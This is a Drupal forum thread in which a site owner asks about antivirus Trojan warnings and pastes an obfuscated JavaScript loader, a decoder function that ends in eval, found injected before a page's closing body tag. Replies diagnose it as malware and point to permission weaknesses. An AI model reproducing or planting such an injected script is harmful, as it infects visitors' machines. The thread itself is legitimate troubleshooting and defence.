Come together with the global Drupal community in Rotterdam, 28 Sept – 1 Oct 2026. Sessions, contribution, connection, and Early Bird savings until 8 June.
By dutchie76 on
Hi,
Our latest Drupal multi-site is being flagged by AGV and Kaspersky Internet Security 2009 as having 2-3 Trojans triggered when users visit the site. My host has said they have since scanned the server for viruses and has given the all clear.
Firstly we have recently upgraded from 6.6 to 6.8. The difference between the two is that we now notice just before the closing body tag the following JS:
function nbnb25(z) {var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,22,42,28,40,58,37,3,7,35,0,0,0,0,0,0,36,34,57,54,26,1,52,4,38,14,39,0,47,24,2,59,16,50,30,29,46,6,45,20,17,31,60,0,0,0,0,8,0,19,41,61,56,32,21,27,5,25,43,9,11,23,10,49,15,33,48,13,12,44,55,62,51,53,18);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<>=8;w-=2}else{w=6}}}eval(h);}}nbnb25('Xw_ANHM@_mb@8nB@fTSrAH_A7U3vNHMqaTde_nkQXzB9zI4xEjc9KzBqlI4o_RdA7TcFfYVeUmk6hTsoInb@1QSQk0S61IdeNAZ9_NMAkliQi83xjR4@IAt6kIkAN5Z28nb9_aBq_nMAl5ZxtYVFmpSFpv3ramcyNU3xEauoXw4ez5dCmlSyUOdepU49zTcvYg36zwbA7TsoNwM612dqYQsAkAdeG9VCk0_eWRdA7ASrp7')After this there is
which is the sites IP
Does anyone know what this code is? My coder thinks its something to do with the 6.8 upgrade or an upgraded module.
If this JS is sound and ideas where we can look?
Any help is greatly appreciated.
Thanks,
Dutchie
Comments
Do not publish harmful code
Please do not publish harmful code in the open. Just publish the function name.
You should disable all modules and see if the code is still there. Later try to enable a module at a time.
You will need to find the source of the infection or redo you web site.
/*_*/
http://www.xmacinfo.com
Are you sure that this code
Are you sure that this code is what the antivirus programs are complaining about? I don't know of anything in core that adds this. Other modules, I don't know.
If you have a test site--something I highly recommend--you can check to see if the code is present on that site as well.
---
"Nice to meet you Rose...run for your life." - The Doctor
My first public Drupal site - EyeOnThe503
malware
If you google for a keyphrase in the script .. "c=z.length" .. you'll find a number of references to malware ..
e.g.
http://badwarebusters.org/main/itemview/405
how to report these issues
Please see My site was defaced ("hacked"). Now what?
This is exactly the wrong way to report issues.
That said, this is very likely a server misconfiguration issue/weak password/use of ftp weakness that was exploited rather than a weakness in Drupal core. See Secure Configurations for information on how to configure your server securely.
--
Growing Venture Solutions | Drupal Dashboard | Learn more about Drupal - buy a Drupal Book
--
Morris Animal Foundation
thanks all for your advice.
thanks all for your advice. I did suspect that the JS was the culprit.
Permissions have been a real issue for us and this could be the most likely reason for the lapse in security. Image upload permissions have forced to us 777 for certain folders which would not normally have these permissions.
Does anyone have any solutions as to how to go about removing the malicious script? Is it encrypted?
I would welcome anyone to look at the site in more detail and lend their advice to solve the issue and identify any vulnerability and I would be more than happy to pay anyone for thier time.
I would sticky the URL to anyone who can lend their expertise.
seems like others report same problem
http://drupal.org/node/356093
so far we have not managed to isolate the problme, remove the script, understand how it exactly happend and how to prevent it happening again.
If anyone has any other recommendations not already mentioned it would be very much apprechiated.
cheers
dutchie
iframe malware removal
There are several variations of iframe malware coming up every month. Here is the summary of different variations and possible removal techniques:
http://paramprojects.com/website/badwarefaq